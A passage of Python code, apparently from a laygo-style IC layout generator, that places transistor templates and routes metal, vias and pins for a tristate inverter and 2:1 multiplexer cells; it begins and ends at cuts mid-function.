refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip4.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in4.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'EN', 'ENB', 'O'], rect_list=[ri0, ren0, renb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_tinv_small_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_2stack, devname_nmos_space, devname_pmos_boundary, devname_pmos_body_2stack, devname_pmos_space, pin_i_abut="nmos", origin=np.array([0,0]), create_pin=False): """small tristate inverter for latches and FFs""" pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in0.name) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_space, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I" + objectname_pfix + 'N4', templatename = devname_nmos_space, gridname = pg, 
refinstname = in3.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX') ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_space, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I" + objectname_pfix + 'P4', templatename = devname_pmos_space, gridname = pg, refinstname = ip3.name, transform='MX') # route # input if pin_i_abut == "nmos": refinstname_in = in1.name refinstname_en0 = in1.name refinstname_en1 = ip1.name else: refinstname_in = ip1.name refinstname_en0 = ip1.name refinstname_en1 = in1.name laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0') ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3) # en laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_en0, refpinname0='G1', 
refinstname1=refinstname_en0, refpinname1='G1') ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_en0, refpinname0='G1', refinstname1=refinstname_en0, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=refinstname_en0, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([1, 0]), refinstname=in1.name, refpinname='G1', gridname=rg_m2m3) # enb laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0+1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_en1, refpinname0='G1', refinstname1=refinstname_en1, refpinname1='G1') renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_en1, refpinname0='G1', refinstname1=refinstname_en1, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=refinstname_en1, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([-1, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) # output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in1.name, refpinname1='D0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, 
refpinname='D0', gridname=rg_m2m3) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S0', refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='S0', refinstname1=ip1.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2) # power and groud rail xy = laygen.get_xy(obj = in2.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip4.name) rvss = laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in4.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'EN', 'ENB', 'O'], rect_list=[ri0, ren0, renb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_mux2to1_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_2stack, #devname_nmos_body_left, devname_nmos_body_right, devname_pmos_boundary, devname_pmos_body_2stack, #devname_pmos_body_left, devname_pmos_body_right, origin=np.array([0, 0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix + 'N0', 
devname_nmos_boundary, pg, xy=origin) #in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_left, gridname = pg, refinstname = in0.name) #in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body_right, gridname = pg, refinstname = in1.name) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in0.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in3.name, transform='MY') #in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_body_right, gridname = pg, refinstname = in4.name, transform='MY') #in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body_left, gridname = pg, refinstname = in5.name, transform='MY') in6 = laygen.relplace(name = "I"+objectname_pfix + 'N6', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in4.name, transform='MY') in7 = laygen.relplace(name = "I"+objectname_pfix + 'N7', templatename = devname_nmos_boundary, gridname = pg, refinstname = in6.name, transform='MY') ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') #ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_left, gridname = pg, refinstname = ip0.name, transform='MX') #ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_body_right, gridname = pg, refinstname = ip1.name, transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX') ip3 = laygen.relplace(name = 
"I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip3.name, transform='R180') #ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_body_right, gridname = pg, refinstname = ip4.name, transform='R180') #ip6 = laygen.relplace(name = "I"+objectname_pfix + 'P6', templatename = devname_pmos_body_left, gridname = pg, refinstname = ip5.name, transform='R180') ip6 = laygen.relplace(name = "I"+objectname_pfix + 'P6', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip4.name, transform='R180') ip7 = laygen.relplace(name = "I"+objectname_pfix + 'P7', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip6.name, transform='R180') generate_inv_1x(laygen, objectname_pfix=objectname_pfix+'INV0', placement_grid=pg, routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3, routing_grid_m1m2_pin=rg_m1m2_pin, routing_grid_m2m3_pin=rg_m2m3_pin, devname_nmos_boundary='nmos4_fast_boundary', devname_nmos_body='nmos4_fast_center_nf1_left', devname_nmos_space='nmos4_fast_space', devname_pmos_boundary='pmos4_fast_boundary', devname_pmos_body='pmos4_fast_center_nf1_left', devname_pmos_space='pmos4_fast_space', pin_i_abut='pmos', origin=laygen.get_xy(obj = in7, gridname = pg), pin_o_y=1, create_pin=False) # in0 laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0') ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', 
refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # in1 laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstname1=ip6.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0') ri1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='G0', refinstname1=in6.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in6.name, refpinname='G0', gridname=rg_m2m3) # en0 #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, # refinstname0=in2.name, refpinname0='G0', refinstname1=in2.name, refpinname1='G0') #ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0-1]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='G0', refinstname1=in2.name, refpinname1='G0', # endstyle0="extend", endstyle1="extend") #laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='G0', gridname=rg_m1m2) #laygen.via(None, np.array([-1, 0]), refinstname=in2.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G1', refinstname1=in1.name, refpinname1='G1') ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0-1]), xy1=np.array([-1, 
2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G1', refinstname1=in1.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G1', gridname=rg_m2m3) # en1 #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, # refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0') #ren1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2+1]), gridname0=rg_m2m3, # refinstname0=in5.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0', # endstyle0="extend", endstyle1="extend") #laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m1m2) #laygen.via(None, np.array([-1, 0]), refinstname=in5.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='G1', refinstname1=in6.name, refpinname1='G1') ren1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2+1]), gridname0=rg_m2m3, refinstname0=in6.name, refpinname0='G1', refinstname1=in6.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in6.name, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([-1, 0]), refinstname=in6.name, refpinname='G1', gridname=rg_m2m3) # enb0 #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, # refinstname0=ip2.name, refpinname0='G0', refinstname1=ip2.name, refpinname1='G0') #renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0-1]), xy1=np.array([0, 2]), gridname0=rg_m2m3, # refinstname0=ip2.name, refpinname0='G0', refinstname1=ip2.name, refpinname1='G0', # 
endstyle0="extend", endstyle1="extend") #laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='G0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='G1', refinstname1=ip1.name, refpinname1='G1') renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0-1]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G1', refinstname1=ip1.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) # enb1 #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, # refinstname0=ip5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0') #renb1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2+1]), gridname0=rg_m2m3, # refinstname0=ip5.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0', # endstyle0="extend", endstyle1="extend") #laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=ip6.name, refpinname0='G1', refinstname1=ip6.name, refpinname1='G1') renb1 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2+1]), gridname0=rg_m2m3, refinstname0=ip6.name, refpinname0='G1', refinstname1=ip6.name, refpinname1='G1', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=ip6.name, refpinname='G1', 
gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip6.name, refpinname='G1', gridname=rg_m2m3) # en/enb cross couple #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0-1]), xy1=np.array([0, -1]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='G0', refinstname1=in5.name, refpinname1='G0') #laygen.via(None, np.array([-1, -1]), refinstname=in2.name, refpinname='G0', gridname=rg_m2m3) #laygen.via(None, np.array([0, -1]), refinstname=in5.name, refpinname='G0', gridname=rg_m2m3) #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0-1]), xy1=np.array([-1, -1]), gridname0=rg_m2m3, # refinstname0=ip2.name, refpinname0='G0', refinstname1=ip5.name, refpinname1='G0') #laygen.via(None, np.array([0, -1]), refinstname=ip2.name, refpinname='G0', gridname=rg_m2m3) #laygen.via(None, np.array([-1, -1]), refinstname=ip5.name, refpinname='G0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0-1]), xy1=np.array([0, -1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G1', refinstname1=in6.name, refpinname1='G1') laygen.via(None, np.array([-1, -1]), refinstname=in1.name, refpinname='G1', gridname=rg_m2m3) laygen.via(None, np.array([0, -1]), refinstname=in6.name, refpinname='G1', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0-1]), xy1=np.array([-1, -1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='G1', refinstname1=ip6.name, refpinname1='G1') laygen.via(None, np.array([0, -1]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) laygen.via(None, np.array([-1, -1]), refinstname=ip6.name, refpinname='G1', gridname=rg_m2m3) # output #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='D0', refinstname1=in5.name, refpinname1='D0') #laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, # 
refinstname0=ip2.name, refpinname0='D0', refinstname1=ip5.name, refpinname1='D0') #ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='D0', refinstname1=ip2.name, refpinname1='D0') #laygen.via(None, np.array([0, 0]), refinstname=in2.name, refpinname='D0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=ip2.name, refpinname='D0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=in5.name, refpinname='D0', gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=ip5.name, refpinname='D0', gridname=rg_m1m2) #laygen.via(None, np.array([1, 0]), refinstname=in2.name, refpinname='D0', gridname=rg_m2m3) #laygen.via(None, np.array([1, 0]), refinstname=ip2.name, refpinname='D0', gridname=rg_m2m3) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in6.name, refpinname1='D0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip6.name, refpinname1='D0') ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip6.name, refpinname1='D0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in6.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip6.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([1, 0]), refinstname=in6.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([1, 0]), refinstname=ip6.name, refpinname='D0', gridname=rg_m2m3) #muxoutput to inverter input 
#laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, # refinstname0=in2.name, refpinname0='D0', refinstname1="I"+objectname_pfix+"INV0N1", refpinname1='G0', # direction="x") laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1="I" + objectname_pfix + "INV0N1", refpinname1='G0', direction="x") laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, -2]), gridname0=rg_m2m3, refinstname0="I" + objectname_pfix + "INV0N1", refpinname0='G0', refinstname1="I" + objectname_pfix + "INV0N1", refpinname1='G0') laygen.via(None, np.array([0, -2]), refinstname="I" + objectname_pfix + "INV0N1", refpinname='G0', gridname=rg_m2m3) #mux output ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0="I" + objectname_pfix + "INV0N1", refpinname0='D0', refinstname1="I" + objectname_pfix + "INV0P1", refpinname1='D0') # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S0', refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='S0', refinstname1=ip1.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in6.name, refpinname0='S0', refinstname1=in6.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip6.name, refpinname0='S0', refinstname1=ip6.name) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2) laygen.via(None, xy_s0 
* np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in6.name, gridname=rg_m1m2)
    laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip6.name, gridname=rg_m1m2)
    # power and ground rail (M2 straps spanning from the left boundary to the output inverter)
    rvdd = laygen.route("R" + objectname_pfix +"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]),
                        xy1=np.array([laygen.get_xy(obj=laygen.get_template(name = devname_pmos_boundary), gridname = rg_m1m2)[0], 0]),
                        gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1="I" + objectname_pfix + "INV0P3")
    rvss = laygen.route("R" + objectname_pfix +"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]),
                        xy1=np.array([laygen.get_xy(obj=laygen.get_template(name = devname_pmos_boundary), gridname = rg_m1m2)[0], 0]),
                        gridname0=rg_m1m2, refinstname0=in0.name, refinstname1="I" + objectname_pfix + "INV0N3")
    # pin creation (optional): I/O pins on M3, rails on M2
    if create_pin == True:
        create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin,
                      pinname_list = ['I0', 'I1', 'EN0', 'EN1', 'O'], rect_list=[ri0, ri1, ren0, renb0, ro0])
        create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss)

def generate_mux2to1(laygen, objectname_pfix, placement_grid,
                     routing_grid_m1m2, routing_grid_m2m3, routing_grid_m3m4, routing_grid_m1m2_pin, routing_grid_m2m3_pin,
                     devname_nmos_boundary, devname_nmos_body, devname_nmos_space,
                     devname_pmos_boundary, devname_pmos_body, devname_pmos_space,
                     m=2, origin=np.array([0, 0]), create_pin=False):
    """generate 2:1 mux

    Places two stacked NMOS/PMOS branches (in1/in2 and in5/in6 plus their
    PMOS counterparts), gated by EN0/EN1 and ENB0/ENB1, whose shared output
    node drives an output inverter (in9/ip9).  The EN/ENB nets are
    cross-coupled on M3 so a single EN pin per branch is exposed.

    Parameters:
        laygen: layout generator object providing place/relplace/route/via
            (laygo-style GridLayoutGenerator -- confirm against caller)
        objectname_pfix: string prefix for all generated instance names
        placement_grid: placement grid name
        routing_grid_m1m2 / _m2m3 / _m3m4: routing grid names
        routing_grid_m1m2_pin / _m2m3_pin: pin grid names
        devname_nmos_boundary / _body / _space: NMOS template cell names
        devname_pmos_boundary / _body / _space: PMOS template cell names
        m: transistor multiplier; halved internally since nf=2 body
            templates are used (clamped to a minimum of 1)
        origin: placement origin on the placement grid
        create_pin: if True, create I0/I1/EN0/EN1/O and VDD/VSS pins
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    rg_m2m3 = routing_grid_m2m3
    rg_m3m4 = routing_grid_m3m4
    rg_m1m2_pin = routing_grid_m1m2_pin
    rg_m2m3_pin = routing_grid_m2m3_pin

    m=max(1, int(m/2)) #using nf=2 devices
    # placement: NMOS row left-to-right, with boundary cells between bodies,
    # a 4-wide space block (NRTE/PRTE) as a routing gap, and mirrored
    # transforms (MY/MX/R180) for the right-hand branch
    in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin)
    in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1]))
    in1a = laygen.relplace(name = "I"+objectname_pfix + 'N1A', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name)
    in1b = laygen.relplace(name = "I"+objectname_pfix + 'N1B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1a.name)
    in2 = laygen.relplace(name = "I"+objectname_pfix + 'N2', templatename = devname_nmos_body, gridname = pg, refinstname = in1b.name, shape=np.array([m, 1]))
    in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name)
    in_rte = laygen.relplace(name = "I"+objectname_pfix + 'NRTE', templatename = devname_nmos_space, gridname = pg, refinstname = in3.name, shape=np.array([4, 1]))
    in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_boundary, gridname = pg, refinstname = in_rte.name, transform='MY')
    in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_body, gridname = pg, refinstname = in4.name, transform='MY', shape=np.array([m, 1]))
    in5a = laygen.relplace(name = "I"+objectname_pfix + 'N5A', templatename = devname_nmos_boundary, gridname = pg, refinstname = in5.name, transform='MY')
    in5b = laygen.relplace(name = "I"+objectname_pfix + 'N5B', templatename = devname_nmos_boundary, gridname = pg, refinstname = in5a.name, transform='MY')
